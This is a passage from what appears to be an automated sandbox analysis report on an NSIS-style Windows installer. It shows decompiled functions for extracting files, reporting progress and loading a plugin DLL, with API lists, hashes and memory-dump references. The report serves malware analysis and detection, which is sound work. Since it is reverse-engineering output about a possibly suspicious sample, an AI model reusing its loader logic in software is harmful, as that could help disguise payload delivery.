                                                                                                                          0x00000000
                                                                                                                          0x100020f7
                                                                                                                          0x100020b4
                                                                                                                          0x100020bb
                                                                                                                          0x100020bd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002042
                                                                                                                          0x10002048
                                                                                                                          0x1000204b
                                                                                                                          0x1000204d
                                                                                                                          0x1000204d
                                                                                                                          0x10002050
                                                                                                                          0x10002054
                                                                                                                          0x10002061
                                                                                                                          0x10002063
                                                                                                                          0x10002069
                                                                                                                          0x10002069
                                                                                                                          0x10002069
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000218d
                                                                                                                          0x10002191
                                                                                                                          0x10002196
                                                                                                                          0x10002199
                                                                                                                          0x100020fd
                                                                                                                          0x100020fd
                                                                                                                          0x100020ff
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002105
                                                                                                                          0x10002105
                                                                                                                          0x10002109
                                                                                                                          0x10002110
                                                                                                                          0x10002134
                                                                                                                          0x10002134
                                                                                                                          0x10002138
                                                                                                                          0x1000213a
                                                                                                                          0x1000213d
                                                                                                                          0x1000213d
                                                                                                                          0x10002140
                                                                                                                          0x10002140
                                                                                                                          0x00000000
                                                                                                                          0x10002138
                                                                                                                          0x10002115
                                                                                                                          0x10002118
                                                                                                                          0x10002118
                                                                                                                          0x1000211f
                                                                                                                          0x10002121
                                                                                                                          0x10002124
                                                                                                                          0x1000212b
                                                                                                                          0x1000212c
                                                                                                                          0x10002132
                                                                                                                          0x10002132
                                                                                                                          0x00000000
                                                                                                                          0x10002132
                                                                                                                          0x10002126
                                                                                                                          0x10002129
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000203b
                                                                                                                          0x10001f05
                                                                                                                          0x10001f05
                                                                                                                          0x10001f06
                                                                                                                          0x10002023
                                                                                                                          0x00000000
                                                                                                                          0x10002023
                                                                                                                          0x10001f0c
                                                                                                                          0x10001f0d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001f13
                                                                                                                          0x10001f13
                                                                                                                          0x10001f16
                                                                                                                          0x10001f5f
                                                                                                                          0x00000000
                                                                                                                          0x10001f5f
                                                                                                                          0x10001f18
                                                                                                                          0x10001f18
                                                                                                                          0x10001f1b
                                                                                                                          0x10001f43
                                                                                                                          0x10001f46
                                                                                                                          0x10001f49
                                                                                                                          0x10002015
                                                                                                                          0x10002015
                                                                                                                          0x10002015
                                                                                                                          0x10001f4f
                                                                                                                          0x10001f4f
                                                                                                                          0x10001f4f
                                                                                                                          0x1000201b
                                                                                                                          0x00000000
                                                                                                                          0x1000201b
                                                                                                                          0x10001f1e
                                                                                                                          0x10001f1e
                                                                                                                          0x10001f1f
                                                                                                                          0x10001f40
                                                                                                                          0x10001f42
                                                                                                                          0x10001f42
                                                                                                                          0x00000000
                                                                                                                          0x10001f42
                                                                                                                          0x10001f21
                                                                                                                          0x10001f21
                                                                                                                          0x10001f24
                                                                                                                          0x10001f3c
                                                                                                                          0x00000000
                                                                                                                          0x10001f3c
                                                                                                                          0x10001f26
                                                                                                                          0x10001f28
                                                                                                                          0x10001f29
                                                                                                                          0x10001f29
                                                                                                                          0x10001f2b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001f2d
                                                                                                                          0x10001f2d
                                                                                                                          0x10001f2e
                                                                                                                          0x10001f38
                                                                                                                          0x00000000
                                                                                                                          0x10001f38
                                                                                                                          0x10001f31
                                                                                                                          0x10001f32
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001f34
                                                                                                                          0x00000000
                                                                                                                          0x10001dae
                                                                                                                          0x10001dae
                                                                                                                          0x10001db1
                                                                                                                          0x00000000
                                                                                                                          0x10001db1
                                                                                                                          0x10001da8
                                                                                                                          0x10001f80
                                                                                                                          0x10001f85
                                                                                                                          0x10001f8a
                                                                                                                          0x10001f8e
                                                                                                                          0x1000233d
                                                                                                                          0x10002343
                                                                                                                          0x10001fa0
                                                                                                                          0x10001fa2
                                                                                                                          0x10001fa3
                                                                                                                          0x100022c0
                                                                                                                          0x100022c0
                                                                                                                          0x100022c3
                                                                                                                          0x100022c6
                                                                                                                          0x100022da
                                                                                                                          0x100022e0
                                                                                                                          0x100022e2
                                                                                                                          0x100022e8
                                                                                                                          0x100022fb
                                                                                                                          0x10002301
                                                                                                                          0x10002301
                                                                                                                          0x1000230e
                                                                                                                          0x10002310
                                                                                                                          0x10002312
                                                                                                                          0x10002318
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002320
                                                                                                                          0x1000232d
                                                                                                                          0x1000232f
                                                                                                                          0x10002331
                                                                                                                          0x10002331
                                                                                                                          0x10002337
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002339
                                                                                                                          0x10002339
                                                                                                                          0x10002339
                                                                                                                          0x10002339
                                                                                                                          0x00000000
                                                                                                                          0x10002339
                                                                                                                          0x100022eb
                                                                                                                          0x100022f1
                                                                                                                          0x100022f3
                                                                                                                          0x100022f9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100022f9
                                                                                                                          0x100022c8
                                                                                                                          0x100022cf
                                                                                                                          0x100022d5
                                                                                                                          0x00000000
                                                                                                                          0x100022d5
                                                                                                                          0x10001fa9
                                                                                                                          0x10001faa
                                                                                                                          0x100022a2
                                                                                                                          0x100022a2
                                                                                                                          0x100022a8
                                                                                                                          0x100022ab
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100022b2
                                                                                                                          0x100022b7
                                                                                                                          0x100022b8
                                                                                                                          0x00000000
                                                                                                                          0x100022b8
                                                                                                                          0x10001fb1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001fb7
                                                                                                                          0x10001fb7
                                                                                                                          0x10001fc0
                                                                                                                          0x10001fc5
                                                                                                                          0x10001fcb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001fd1
                                                                                                                          0x10001fde
                                                                                                                          0x10001fe4
                                                                                                                          0x10001fee
                                                                                                                          0x10001ff4
                                                                                                                          0x10001ffc
                                                                                                                          0x1000200c
                                                                                                                          0x00000000
                                                                                                                          0x1000200c

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001541: GlobalAlloc.KERNELBASE(00000040,10001577,?,?,10001804,?,10001017), ref: 10001549
                                                                                                                            • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                            • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001E28
                                                                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 10001E74
                                                                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 10001E7E
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001E98
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001F80
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001F85
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001F8A
                                                                                                                          • GlobalFree.KERNEL32 ref: 1000212C
                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 10002273
                                                                                                                          • GetModuleHandleA.KERNEL32(00000008), ref: 100022DA
                                                                                                                          • LoadLibraryA.KERNEL32(00000008), ref: 100022EB
                                                                                                                          • GetProcAddress.KERNEL32(?,00000408), ref: 1000230E
                                                                                                                          • lstrcatA.KERNEL32(00000408,10004024), ref: 10002320
                                                                                                                          • GetProcAddress.KERNEL32(?,00000408), ref: 1000232D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$lstrcpy$AddressAllocProc$HandleLibraryLoadModulelstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2432367840-0
                                                                                                                          • Opcode ID: ee092e71ca505709d651e0729bf6a215d1fa5f7789b41da9f2bb1e621745af8d
                                                                                                                          • Instruction ID: 43630dbe77052cbd99e7b50fc19318fc31bc1fc88c17e7e17ecc67392abc93a9
                                                                                                                          • Opcode Fuzzy Hash: ee092e71ca505709d651e0729bf6a215d1fa5f7789b41da9f2bb1e621745af8d
                                                                                                                          • Instruction Fuzzy Hash: 94029C71D0464ADFEB60CFA4C8807EEBBF4FB043C4F21852AE5A5A7189D7749A81DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E0040553D(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004054D0(E004059DD(0x409b50, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b50);
					E004059DD();
				}
				E00405C3F(0x409b50);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405CD8(0x409b50);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405695(0x409b50);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004056B4(0x409b50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404D7B(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f08;
						goto L32;
					} else {
						E004059DD(0x40a350, 0x424000);
						E004059DD(0x424000, 0x409b50);
						E004059FF(_t75, 0x40a350, 0x409b50, "C:\Users\engineer\AppData\Local\Temp\nse728B.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E004059DD(0x424000, 0x40a350);
						_t62 = E0040529E("C:\Users\engineer\AppData\Local\Temp\nse728B.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f08 =  &( *0x423f08->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b50);
								_push(0xfffffffa);
								E00404D7B();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D7B(0xffffffea,  *(_t85 - 8));
				 *0x423f34 =  *0x423f34 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E5B(); // executed
				 *0x423f34 =  *0x423f34 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004059FF(_t75, _t80, 0x409b50, 0x409b50, 0xffffffee);
					} else {
						E004059FF(_t75, _t80, 0x409b50, 0x409b50, 0xffffffe9);
						lstrcatA(0x409b50,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b50);
					E0040529E();
					goto L29;
				}
				goto L33;
			}
















                                                                                                                          0x00401734
                                                                                                                          0x0040173b
                                                                                                                          0x00401744
                                                                                                                          0x00401747
                                                                                                                          0x0040174a
                                                                                                                          0x0040174f
                                                                                                                          0x00401757
                                                                                                                          0x00401773
                                                                                                                          0x00401759
                                                                                                                          0x00401759
                                                                                                                          0x0040175a
                                                                                                                          0x0040175a
                                                                                                                          0x00401779
                                                                                                                          0x00401783
                                                                                                                          0x00401783
                                                                                                                          0x00401787
                                                                                                                          0x0040178a
                                                                                                                          0x0040178f
                                                                                                                          0x00401791
                                                                                                                          0x00401793
                                                                                                                          0x00401798
                                                                                                                          0x00401798
                                                                                                                          0x004017a3
                                                                                                                          0x004017a3
                                                                                                                          0x004017b4
                                                                                                                          0x004017b6
                                                                                                                          0x004017b6
                                                                                                                          0x004017b7
                                                                                                                          0x004017b7
                                                                                                                          0x004017ba
                                                                                                                          0x004017bd
                                                                                                                          0x004017c0
                                                                                                                          0x004017c0
                                                                                                                          0x004017c7
                                                                                                                          0x004017d6
                                                                                                                          0x004017db
                                                                                                                          0x004017de
                                                                                                                          0x004017e1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004017e3
                                                                                                                          0x004017e6
                                                                                                                          0x00401840
                                                                                                                          0x00401845
                                                                                                                          0x004015a8
                                                                                                                          0x0040265c
                                                                                                                          0x0040265c
                                                                                                                          0x0040288b
                                                                                                                          0x0040288e
                                                                                                                          0x0040288e
                                                                                                                          0x00000000
                                                                                                                          0x004017e8
                                                                                                                          0x004017ee
                                                                                                                          0x004017f9
                                                                                                                          0x00401806
                                                                                                                          0x00401811
                                                                                                                          0x00401827
                                                                                                                          0x00401827
                                                                                                                          0x0040182a
                                                                                                                          0x00000000
                                                                                                                          0x00401830
                                                                                                                          0x00401830
                                                                                                                          0x00401831
                                                                                                                          0x0040184e
                                                                                                                          0x00402894
                                                                                                                          0x00402894
                                                                                                                          0x00402894
                                                                                                                          0x00401833
                                                                                                                          0x00401833
                                                                                                                          0x00401834
                                                                                                                          0x00401492
                                                                                                                          0x0040220e
                                                                                                                          0x0040220e
                                                                                                                          0x0040220e
                                                                                                                          0x00401831
                                                                                                                          0x0040182a
                                                                                                                          0x00402896
                                                                                                                          0x0040289a
                                                                                                                          0x0040289a
                                                                                                                          0x0040185e
                                                                                                                          0x00401863
                                                                                                                          0x00401869
                                                                                                                          0x0040186a
                                                                                                                          0x0040186b
                                                                                                                          0x0040186e
                                                                                                                          0x00401871
                                                                                                                          0x00401876
                                                                                                                          0x0040187c
                                                                                                                          0x00401880
                                                                                                                          0x00401882
                                                                                                                          0x0040188a
                                                                                                                          0x00401896
                                                                                                                          0x00401884
                                                                                                                          0x00401884
                                                                                                                          0x00401888
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00401888
                                                                                                                          0x0040189f
                                                                                                                          0x004018a5
                                                                                                                          0x004018a7
                                                                                                                          0x00000000
                                                                                                                          0x004018ad
                                                                                                                          0x004018ad
                                                                                                                          0x004018b0
                                                                                                                          0x004018c8
                                                                                                                          0x004018b2
                                                                                                                          0x004018b5
                                                                                                                          0x004018be
                                                                                                                          0x004018be
                                                                                                                          0x004018cd
                                                                                                                          0x004018d2
                                                                                                                          0x00402209
                                                                                                                          0x00000000
                                                                                                                          0x00402209
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                                            • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,sail Setup,NSIS Error), ref: 004059EA
                                                                                                                            • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                            • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                            • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                                                            • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nse728B.tmp$C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll$Call
                                                                                                                          • API String ID: 1941528284-2845556833
                                                                                                                          • Opcode ID: c66380c8fa0b887d4e17fb9e13828c0b6bba1636114cd380fdc525b4a1122b51
                                                                                                                          • Instruction ID: 7896ef4f757b45501086316f909c91b804aeab5b8a53035332c5850d51b772f7
                                                                                                                          • Opcode Fuzzy Hash: c66380c8fa0b887d4e17fb9e13828c0b6bba1636114cd380fdc525b4a1122b51
                                                                                                                          • Instruction Fuzzy Hash: FA41C272900615BACF10BBA5DD46EAF3A79EF01329B20433BF515F11E1D63C4A419AAD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402E5B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00402E5B(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				int _t66;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				intOrPtr _t91;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f020;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					_t91 =  *0x423ed8; // 0x8f76
					E00403080(_t91 + _t60);
				}
				_t62 = E0040304E( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E0040304E(0x40b020, _t98) == 0) {
									goto L34;
								} else {
									_t66 = WriteFile(_a8, 0x40b020, _t98,  &_a12, 0); // executed
									if(_t66 == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E0040304E(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00405DD9(0x40af90);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E0040304E(0x40b020, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40afa8 = 0x40b020;
						 *0x40afac = _t99;
						while(1) {
							 *0x40afb0 = _t88;
							 *0x40afb4 = _v12; // executed
							_t74 = E00405DF9(0x40af90); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40afb0; // 0x40f020
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423f34 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404D7B(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40afb0; // 0x40f020
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}

























                                                                                                                          0x00402e63
                                                                                                                          0x00402e67
                                                                                                                          0x00402e6a
                                                                                                                          0x00402e6f
                                                                                                                          0x00402e71
                                                                                                                          0x00402e71
                                                                                                                          0x00402e78
                                                                                                                          0x00402e7c
                                                                                                                          0x00402e80
                                                                                                                          0x00402e82
                                                                                                                          0x00402e82
                                                                                                                          0x00402e87
                                                                                                                          0x00402e8c
                                                                                                                          0x00402e8e
                                                                                                                          0x00402e97
                                                                                                                          0x00402e97
                                                                                                                          0x00402ea2
                                                                                                                          0x00402ea9
                                                                                                                          0x00402ff9
                                                                                                                          0x00402ff9
                                                                                                                          0x00000000
                                                                                                                          0x00402eaf
                                                                                                                          0x00402eb3
                                                                                                                          0x00402fe4
                                                                                                                          0x00403039
                                                                                                                          0x00402ffe
                                                                                                                          0x00403004
                                                                                                                          0x00403006
                                                                                                                          0x00403006
                                                                                                                          0x00403017
                                                                                                                          0x00000000
                                                                                                                          0x00403019
                                                                                                                          0x00403024
                                                                                                                          0x0040302c
                                                                                                                          0x00402fde
                                                                                                                          0x00402fde
                                                                                                                          0x00402ffb
                                                                                                                          0x00402ffb
                                                                                                                          0x00000000
                                                                                                                          0x00403033
                                                                                                                          0x00403033
                                                                                                                          0x00403036
                                                                                                                          0x00000000
                                                                                                                          0x00403036
                                                                                                                          0x0040302c
                                                                                                                          0x00403017
                                                                                                                          0x00403044
                                                                                                                          0x00000000
                                                                                                                          0x00403044
                                                                                                                          0x00402fe9
                                                                                                                          0x00402feb
                                                                                                                          0x00402feb
                                                                                                                          0x00402ff7
                                                                                                                          0x00403041
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402ff7
                                                                                                                          0x00402ec4
                                                                                                                          0x00402ec7
                                                                                                                          0x00402ecc
                                                                                                                          0x00402ecc
                                                                                                                          0x00402ed6
                                                                                                                          0x00402ed9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402edf
                                                                                                                          0x00402edf
                                                                                                                          0x00402edf
                                                                                                                          0x00402ee7
                                                                                                                          0x00402ee9
                                                                                                                          0x00402ee9
                                                                                                                          0x00402efa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402f00
                                                                                                                          0x00402f03
                                                                                                                          0x00402f09
                                                                                                                          0x00402f0f
                                                                                                                          0x00402f17
                                                                                                                          0x00402f1d
                                                                                                                          0x00402f22
                                                                                                                          0x00402f29
                                                                                                                          0x00402f2c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402f32
                                                                                                                          0x00402f38
                                                                                                                          0x00402f3a
                                                                                                                          0x00402f47
                                                                                                                          0x00402f49
                                                                                                                          0x00402f77
                                                                                                                          0x00402f7d
                                                                                                                          0x00402f86
                                                                                                                          0x00402f8b
                                                                                                                          0x00402f8b
                                                                                                                          0x00402f92
                                                                                                                          0x00402fd2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402f94
                                                                                                                          0x00402f97
                                                                                                                          0x00402fb7
                                                                                                                          0x00402fba
                                                                                                                          0x00402fbd
                                                                                                                          0x00402fc3
                                                                                                                          0x00402fc7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402fcd
                                                                                                                          0x00402fa3
                                                                                                                          0x00402fab
                                                                                                                          0x00000000
                                                                                                                          0x00402fb2
                                                                                                                          0x00402fb2
                                                                                                                          0x00000000
                                                                                                                          0x00402fb2
                                                                                                                          0x00402fab
                                                                                                                          0x00402f92
                                                                                                                          0x00402fda
                                                                                                                          0x00000000
                                                                                                                          0x00402fda
                                                                                                                          0x00000000
                                                                                                                          0x00402edf

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EB9
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402F3A
                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F67
                                                                                                                          • wsprintfA.USER32 ref: 00402F77
                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,0040F020,00000000,00000000), ref: 00402FA3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CountTick$FileWritewsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 4209647438-2449383134
                                                                                                                          • Opcode ID: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
                                                                                                                          • Instruction ID: 77f196e3f4de2b0f7ff2a56d5fa3bb7e3b28ee40e2402e388f788a2720e93e15
                                                                                                                          • Opcode Fuzzy Hash: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
                                                                                                                          • Instruction Fuzzy Hash: F151917190121A9BCF10CF55DA48AAF7B78AF04795F10413BF810B72C0D7B89E50DBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
